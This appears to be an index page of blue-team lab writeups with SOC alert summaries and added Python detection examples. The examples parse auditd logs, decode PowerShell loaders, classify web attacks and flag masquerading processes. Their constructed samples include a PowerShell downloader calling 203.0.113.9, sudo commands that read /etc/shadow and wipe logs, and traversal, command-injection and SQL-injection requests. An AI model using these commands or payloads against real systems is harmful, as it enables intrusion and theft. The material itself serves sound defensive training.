Writeups for Blue Team Labs Online (BTLO) challenges.

Focus areas:

  • Log analysis
  • Endpoint forensics
  • Detection engineering
  • Threat hunting techniques

Emphasis is on blue-team thinking and investigation flow.

SOC326 Case Study: Impersonating Domain MX Record Change Leading to Active Phishing Campaign

Event ID: 304
Rule Name: SOC326 – Impersonating Domain MX Record Change Detected
Severity: HIGH
Category: Brand Protection / Phishing
Event Time: September 17, 2024 – 12:05 PM
Impacted Asset: LETSDEFEND

Background
Sometimes attackers don’t kick the door down — they quietly make a copy of your house key first. In this case, the threat actor registered a look-alike domain and configured email infrastructure before launching a phishing campaign. What initially appeared to be an early warning quickly escalated into active exploitation, resulting in a user clicking a malicious link and communicating with attacker-controlled infrastructure.
[Read more]

SOC153 Case Study: Malicious PowerShell Execution Leading to Active Malware Infection

Event ID: 238
Rule Name: SOC153 – Suspicious PowerShell Script Executed
Severity: HIGH
Category: Endpoint Compromise / Malware
Event Time: March 14, 2024 – 05:23 PM
Compromised Host: Tony (172.16.17.206)

Tony opened a suspicious file at work that they probably shouldn’t have. It was like finding a strange USB drive in the parking lot and plugging it into your computer: you don’t know what’s on it, but it starts doing things automatically.
[Read more]

SOC127 Case Study: Successful SQL Injection Attack via Automated Tooling

Alert Name: SOC127 – SQL Injection Detected
Severity: High
Event ID: 235
Event Time: Mar 07, 2024 – 12:51 PM
Category: Web Application Attack
Platform: LetsDefend SOC

This incident shows how someone on the internet tried to trick a website into giving out information it wasn’t supposed to. Instead of breaking in directly, the attacker sent specially crafted requests to the website to see how it would respond. Even though the website replied with “everything is OK,” it was actually doing things it shouldn’t have in the background.
[Read more]

BTLO Incident Response Case Study: Pranoid

Executive Summary
A forensic review of Linux auditd logs confirms that the host was compromised through an external SSH brute-force attack. The attacker authenticated as a low-privileged user, executed automated system enumeration, escalated privileges using a local sudo vulnerability, accessed sensitive credential material, and attempted basic anti-forensic cleanup. The entire intrusion lifecycle occurred within approximately six minutes.

Scope and Evidence
Primary artifact: audit.log (Linux auditd)
Tools used: aureport, ausearch, manual timeline correlation
Observed timeframe:
[Read more]
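The correlation the Pranoid summary describes (repeated failed sshd authentications from one source, then a success, then sudo activity) can be scripted directly against audit.log instead of read off aureport by hand. The block below is an added example, not code from the writeup; the audit lines it parses are constructed to match auditd's native format, and the source IP 203.0.113.7, the account "dev", the timestamps and the commands are assumptions.

```python
"""Added example: correlate an auditd excerpt for the SSH brute-force -> sudo
pattern described above. Not part of the Pranoid writeup; the log lines,
IP 203.0.113.7, account names and timestamps are constructed."""
import re
from collections import defaultdict

# Constructed audit.log excerpt in auditd's native format (not challenge data).
# USER_CMD hex-encodes the cmd field when it contains spaces, as real auditd does.
SAMPLE_AUDIT_LOG = """\
type=USER_AUTH msg=audit(1700000000.101:201): pid=900 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="dev" exe="/usr/sbin/sshd" hostname=203.0.113.7 addr=203.0.113.7 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1700000002.330:202): pid=901 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="dev" exe="/usr/sbin/sshd" hostname=203.0.113.7 addr=203.0.113.7 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1700000004.512:203): pid=902 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=? acct="dev" exe="/usr/sbin/sshd" hostname=203.0.113.7 addr=203.0.113.7 terminal=ssh res=failed'
type=USER_AUTH msg=audit(1700000006.740:204): pid=903 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication grantors=pam_unix acct="dev" exe="/usr/sbin/sshd" hostname=203.0.113.7 addr=203.0.113.7 terminal=ssh res=success'
type=USER_CMD msg=audit(1700000130.005:260): pid=950 uid=1001 auid=1001 ses=4 msg='cwd="/home/dev" cmd=636174202F6574632F736861646F77 exe="/usr/bin/sudo" terminal=pts/0 res=success'
type=USER_CMD msg=audit(1700000131.010:261): pid=951 uid=1001 auid=1001 ses=4 msg='cwd="/home/dev" cmd=726D202D7266202F7661722F6C6F672F617574682E6C6F67 exe="/usr/bin/sudo" terminal=pts/0 res=success'
"""

LINE_RE = re.compile(
    r"^type=(?P<type>\w+) msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):(?P<rest>.*)$")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Turn one auditd line into a flat dict; the nested msg='...' sub-record
    (PAM / sudo details) is parsed into the same dict."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"type": m["type"], "ts": float(m["ts"]), "serial": int(m["serial"])}
    rest = m["rest"]
    inner = re.search(r"msg='([^']*)'", rest)
    if inner:
        rest = rest[:inner.start()]
        for key, val in FIELD_RE.findall(inner.group(1)):
            rec[key] = val.strip('"')
    for key, val in FIELD_RE.findall(rest):
        rec[key] = val.strip('"')
    return rec


def decode_cmd(value):
    """auditd hex-encodes USER_CMD's cmd when it contains spaces or quotes;
    a plain command such as cmd="id" is already readable."""
    if len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
        try:
            return bytes.fromhex(value).decode("utf-8", "replace")
        except ValueError:
            pass
    return value


def find_bruteforce_then_success(records, threshold=3, window=300):
    """Source IPs with >= threshold failed sshd authentications in the `window`
    seconds before a successful one. Returns (addr, acct, failures, success_ts)."""
    failures = defaultdict(list)
    hits = []
    for r in sorted(records, key=lambda r: (r["ts"], r["serial"])):
        if r["type"] != "USER_AUTH" or r.get("exe") != "/usr/sbin/sshd":
            continue
        addr = r.get("addr", "?")
        if r.get("res") == "failed":
            failures[addr].append(r["ts"])
        elif r.get("res") == "success":
            recent = [t for t in failures[addr] if r["ts"] - t <= window]
            if len(recent) >= threshold:
                hits.append((addr, r.get("acct"), len(recent), r["ts"]))
            failures[addr].clear()
    return hits


def sudo_commands(records):
    """Decode every sudo-executed command and tag the ones worth a second look."""
    out = []
    for r in records:
        if r["type"] != "USER_CMD" or "cmd" not in r:
            continue
        cmd = decode_cmd(r["cmd"])
        tags = []
        if "/etc/shadow" in cmd:
            tags.append("credential-access")
        if re.search(r"\brm\b.*(/var/log|\.bash_history)", cmd):
            tags.append("anti-forensics")
        out.append({"ts": r["ts"], "auid": r.get("auid"), "cmd": cmd, "tags": tags})
    return out


def triage(log_text):
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    return {"bruteforce": find_bruteforce_then_success(records),
            "sudo": sudo_commands(records)}


if __name__ == "__main__":
    for key, val in triage(SAMPLE_AUDIT_LOG).items():
        print(key, val)
```

Run it against a real audit.log by passing the file contents to triage(); the threshold and window are the two knobs worth tuning, since a slow brute force spread over hours will not trip a 300-second window.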

SOC205 Case Study: Malicious Macro Execution via Phishing Invoice

Alert Name: SOC205 – Malicious Macro has been executed
Severity: High
Event ID: 231
Event Time: Feb 28, 2024 – 08:42 AM
Category: Malware
Platform: LetsDefend SOC

Executive Summary (Management / Business)
On February 28, 2024, a user received a malicious email that appeared to contain a legitimate invoice document. When the user opened the attachment, hidden malicious code inside the document was automatically executed. This hidden code attempted to connect to an external system controlled by an attacker and download additional harmful software.
[Read more]

Packet Puzzle

Scenario
You are a junior security analyst at a small Japanese cryptocurrency trading company. After detecting suspicious activity on the internal network, you exported a PCAP for further investigation.
[Read more]

Space Age

Introduction
The year is 2525 and you’ve just embarked on a journey to visit all planets in the Solar System (Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus and Neptune). The first stop is Mercury, where customs require you to fill out a form (bureaucracy is apparently not Earth-specific). As you hand over the form to the customs officer, they scrutinize it and frown. “Do you really expect me to believe you’re just 50 years old?
[Read more]

LetsDefend SOC138 – Suspicious XLS Malware Analysis

Alert Name: SOC138 – Detected Suspicious Xls File
Severity: High
Event ID: 77
Event Time: Mar 13, 2021, 08:20 PM
Category: Malware

Playbook
1. Alert Overview
A high-risk malware alert was triggered due to the detection of a suspicious Excel macro-enabled file (.xlsm) on the host Sofia. Macro-enabled Excel documents are commonly abused to deliver malware via embedded VBA code that downloads and executes malicious payloads. The file was allowed by the security device, increasing the potential risk of system compromise.
[Read more]

GothamLegend Incident Response – PowerShell Malware Analysis

Scenario
Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team - all you have is an encoded PowerShell script. Can you decode it and identify what malware is responsible for this attack?
[Read more]
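Both the GothamLegend scenario and the SOC153 PowerShell alert above start from an encoded script, and the decoding steps are the same every time: base64-decode the -EncodedCommand blob as UTF-16LE, look for an inner FromBase64String(...) payload, inflate it if it was wrapped in a DeflateStream or GZipStream, and pull out the URLs and file paths. The block below is an added example and is not code from either writeup; the sample it decodes is constructed at runtime to mimic that loader idiom, and the URL http://203.0.113.9/x.exe and the C:\Users\Public\x.exe path inside it are made up.

```python
"""Added example: peel the layers of an encoded PowerShell loader. Not from
the GothamLegend (or SOC153) writeup; the sample below is constructed to
mimic a common -EncodedCommand + DeflateStream pattern, and the URL
http://203.0.113.9/x.exe and paths in it are made up."""
import base64
import re
import zlib

INNER_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def encode_command(script):
    """The -EncodedCommand form: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le")


def inflate(data):
    """Try raw DEFLATE (IO.Compression.DeflateStream) then gzip (GZipStream)."""
    for wbits in (-15, 31):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    return None


def peel(b64, max_layers=5):
    """Return every decoded layer, outermost first."""
    layers = [decode_encoded_command(b64)]
    for _ in range(max_layers):
        m = INNER_B64_RE.search(layers[-1])
        if not m:
            break
        blob = base64.b64decode(m.group(1))
        inflated = inflate(blob)
        if inflated is not None:
            text = inflated.decode("utf-8", "replace")
        elif b"\x00" in blob[:4]:          # looks like UTF-16LE text
            text = blob.decode("utf-16-le", "replace")
        else:
            text = blob.decode("utf-8", "replace")
        layers.append(text)
    return layers


def extract_iocs(text):
    return {"urls": re.findall(r"https?://[^\s'\"()]+", text),
            "paths": sorted(set(re.findall(r"[A-Za-z]:\\[^\s'\"()]+", text)))}


def build_sample():
    """Constructed sample (not challenge data): a downloader wrapped in the
    DeflateStream loader idiom, then wrapped again as -EncodedCommand."""
    inner = ("$c=New-Object Net.WebClient;"
             "$c.DownloadFile('http://203.0.113.9/x.exe','C:\\Users\\Public\\x.exe');"
             "Start-Process 'C:\\Users\\Public\\x.exe'")
    co = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE, no zlib header
    blob = base64.b64encode(co.compress(inner.encode()) + co.flush()).decode()
    outer = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
             "[IO.MemoryStream][Convert]::FromBase64String('" + blob + "'),"
             "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::UTF8)).ReadToEnd()")
    return encode_command(outer)


if __name__ == "__main__":
    layers = peel(build_sample())
    for i, layer in enumerate(layers):
        print(f"--- layer {i} ---\n{layer}")
    print(extract_iocs(layers[-1]))
```

Swap build_sample() for the blob taken from the process command line or the script file and read the last layer; if peel() stops early, the inner payload is usually XOR- or string-obfuscated rather than compressed, which this block does not attempt to undo.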

LetsDefend HTTP Basic Authentication Analysis – PCAP Investigation

Description
In this challenge, we receive a log indicating a possible web-based attack. The objective is to analyze a provided PCAP file and extract meaningful information related to HTTP activity and authentication.

Investigation Process
Recovering the PCAP File
The PCAP was initially obtained inside a VM, and the files were copied out from there. Because there was little network traffic, the capture file was small, so the following commands were used to copy the files out of the VM:
[Read more]

LetsDefend SOC168 – Command Injection (whoami) Web Attack Analysis

Alert Name: SOC168 – Whoami Command Detected in Request Body
Severity: High
Event ID: 118
Event Time: Feb 28, 2022, 04:12 AM
Category: Web Attack

Playbook
1. Alert Overview
A high-severity web attack alert was triggered on WebServer1004 due to the detection of the whoami command within the HTTP request body. This behavior is commonly associated with command injection attempts, where an attacker tries to execute system-level commands through a web application.
[Read more]

LetsDefend SOC170 – Local File Inclusion (LFI) Attempt Analysis

Event ID: 120
Event Time: Mar 01, 2022, 10:10 AM
Rule: SOC170 – Passwd Found in Requested URL – Possible LFI Attack
Analyst Level: Security Analyst
Hostname: WebServer1006
Destination IP Address: 172.16.17.13
Source IP Address: 106.55.45.162
HTTP Request Method: GET
Requested URL: https://172.16.17.13/?file=../../../../etc/passwd
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Alert Trigger Reason: URL contains passwd
Device Action: Allowed

Playbook
1. Alert Overview
A web attack alert was triggered on WebServer1006 due to the detection of a directory traversal payload attempting to access the sensitive system file /etc/passwd via an HTTP GET request.
[Read more]
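The three web-attack alerts above (SOC127 SQL injection, SOC168 whoami in the request body, SOC170 traversal to /etc/passwd) all come down to normalising a request and matching a handful of patterns, and the normalisation step matters: a single URL-decode misses the double-encoded `%252e%252e%252f` form of `../`. The block below is an added example, not code from any of the writeups. Only the first request reuses the URL and User-Agent from the SOC170 alert fields; the host app.example, the other requests and the scanner User-Agent strings are constructed.

```python
"""Added example: request-level checks behind the SOC127 (SQLi), SOC168
(command injection) and SOC170 (LFI) alerts, run over constructed requests.
Not from the writeups; only SAMPLE_REQUESTS[0] reuses the SOC170 alert fields."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "win.ini", "boot.ini")
TRAVERSAL_RE = re.compile(r"\.\./")
# A shell metacharacter or start-of-string followed by a common recon/download binary.
CMDI_RE = re.compile(r"(?:^|[;&|`$(\s])(whoami|uname|cat|wget|curl|powershell)\b", re.I)
# Tautology (' OR '1'='1), UNION SELECT, time-based sleep(), or comment terminators.
SQLI_RE = re.compile(
    r"'\s*(or|and)\s*[\w'\"]+\s*=\s*[\w'\"]+|union\s+select|sleep\(\d+\)|--\s|/\*", re.I)
SCANNER_UA = ("sqlmap", "nikto", "nmap", "wfuzz")

# Constructed sample traffic; [0] is the SOC170 alert's URL and User-Agent.
SAMPLE_REQUESTS = [
    {"method": "GET", "url": "https://172.16.17.13/?file=../../../../etc/passwd",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"},
    {"method": "GET",  # double-encoded traversal: one decode pass would miss it
     "url": "https://app.example/download?doc=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
     "user_agent": "curl/8.0"},
    {"method": "POST", "url": "https://app.example/ping",
     "body": "host=127.0.0.1;whoami", "user_agent": "Mozilla/5.0"},
    {"method": "GET", "url": "https://app.example/item?id=1%27%20OR%20%271%27%3D%271",
     "user_agent": "sqlmap/1.7#stable (https://sqlmap.org)"},
    {"method": "GET", "url": "https://app.example/item?id=42", "user_agent": "Mozilla/5.0"},
]


def normalize(value, rounds=3):
    """Percent-decode until stable (bounded), then fold backslashes to slashes."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def classify(req):
    """Return (category, location, evidence) findings for one request."""
    findings = []
    parts = urlsplit(req["url"])
    path = normalize(parts.path)
    if TRAVERSAL_RE.search(path) or path.endswith(SENSITIVE_FILES):
        findings.append(("LFI", "path", path))
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        val = normalize(raw)
        if TRAVERSAL_RE.search(val) or val.endswith(SENSITIVE_FILES):
            findings.append(("LFI", name, val))
        if SQLI_RE.search(val):
            findings.append(("SQLi", name, val))
    body = normalize(req.get("body", ""))
    if CMDI_RE.search(body):
        findings.append(("CMDi", "body", body))
    if SQLI_RE.search(body):
        findings.append(("SQLi", "body", body))
    ua = req.get("user_agent", "")
    if any(s in ua.lower() for s in SCANNER_UA):
        findings.append(("scanner", "User-Agent", ua))
    return findings


def triage(requests):
    return [(r["method"], r["url"], [f[0] for f in classify(r)]) for r in requests]


if __name__ == "__main__":
    for method, url, tags in triage(SAMPLE_REQUESTS):
        print(f"{method} {url} -> {tags or 'clean'}")
```

These are the same heuristics a WAF rule encodes, so expect the same false positives (a product description containing "cat" followed by a space trips nothing, but "-- " inside free text trips the SQLi comment check); the point of decoding in rounds is that the traversal payload in request [1] is invisible until the second pass.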

LetsDefend SOC335 – CVE-2024-49138 Privilege Escalation Exploitation Analysis

Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected
Severity: High
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Category: Privilege Escalation

Base Information
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Rule: SOC335 – CVE-2024-49138 Exploitation Detected
Analyst Level: Security Analyst
Hostname: Victor
IP Address: 172.16.17.207
Process Name: svohost.exe
Process Path: C:\temp\service_installer\svohost.exe
Process ID: 7640
Parent Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
File Hash (SHA-256): b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
Process User: EC2AMAZ-ILGVOIN\LetsDefend
Trigger Reason: Suspicious behavior patterns linked to CVE-2024-49138
Device Action: Allowed

Incident Details
Incident Name: EventID 313 – SOC335 CVE-2024-49138 Exploitation
Incident Type: Privilege Escalation
Created Date: Jan 08, 2026, 09:12 AM

Pre-Investigation Notes
Date: Jan 22, 2025, 02:37 AM
Hostname: Victor
IP Address: 172.
[Read more]
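Before touching the CVE itself, the SOC335 alert fields already give three cheap signals: the process name svohost.exe is one character away from svchost.exe, it runs from C:\temp rather than System32, and its parent is powershell.exe. Those checks are worth automating across process-creation telemetry. The block below is an added example and not code from the writeup; the allow-list of system binaries and the staging-directory list are small assumed subsets, and the benign comparison paths are constructed.

```python
"""Added example: flag a process that masquerades as a Windows system binary
(svohost.exe vs svchost.exe) or runs from a staging path under a script host.
Not from the SOC335 writeup; the allow-list and staging directories below are
assumed subsets, not complete inventories."""
from pathlib import PureWindowsPath

SYSTEM32 = r"c:\windows\system32"
# Assumed allow-list: well-known Windows binaries and where they legitimately live.
KNOWN_BINARIES = {
    "svchost.exe": SYSTEM32, "conhost.exe": SYSTEM32, "lsass.exe": SYSTEM32,
    "csrss.exe": SYSTEM32, "services.exe": SYSTEM32, "winlogon.exe": SYSTEM32,
    "explorer.exe": r"c:\windows",
}
STAGING_DIRS = (r"c:\temp", r"c:\windows\temp", r"c:\users\public", r"\appdata\local\temp")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def edit_distance(a, b):
    """Levenshtein distance; one substitution separates svohost from svchost."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_process(path, parent_path):
    """Return human-readable findings for one process-creation record."""
    findings = []
    p = PureWindowsPath(path)
    name, directory = p.name.lower(), str(p.parent).lower()
    parent_name = PureWindowsPath(parent_path).name.lower()
    if name in KNOWN_BINARIES:
        # Right name, wrong place: a copied or planted binary.
        if directory != KNOWN_BINARIES[name]:
            findings.append(f"{name} running outside {KNOWN_BINARIES[name]}: {directory}")
    else:
        # Unknown name within one edit of a system binary: typo-squatted masquerade.
        for legit in KNOWN_BINARIES:
            if edit_distance(name, legit) <= 1:
                findings.append(f"{name} is a look-alike of {legit}")
    if any(d in directory for d in STAGING_DIRS):
        findings.append(f"executes from staging directory {directory}")
    if parent_name in SCRIPT_HOSTS:
        findings.append(f"spawned by script host {parent_name}")
    return findings


if __name__ == "__main__":
    # The SOC335 alert's process and parent paths.
    for line in check_process(r"C:\temp\service_installer\svohost.exe",
                              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"):
        print("-", line)
```

Feed it the Image and ParentImage fields from Sysmon event 1 or Security event 4688 records; the edit-distance check is what catches names a plain allow-list lookup would simply not know about.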

LetsDefend SOC336 – Windows OLE Zero-Click RCE (CVE-2025-21298) Analysis

Alert Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected
Severity: Critical
Event ID: 314
Event Time: Feb 04, 2025, 04:18 PM
Category: Malware

Base Information
Severity: Critical
Event ID: 314
Event Time: Feb 04, 2025, 04:18 PM
Rule Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected
CVE: CVE-2025-21298
Analyst Level: Security Analyst
Source IP / SMTP Address: 84.38.130.118
Sender Email: projectmanagement@pm.me
Recipient Email: Austin@letsdefend.io
Email Subject: Important: Action Required for Upcoming Project Deadline
Attachment Name: mail.
[Read more]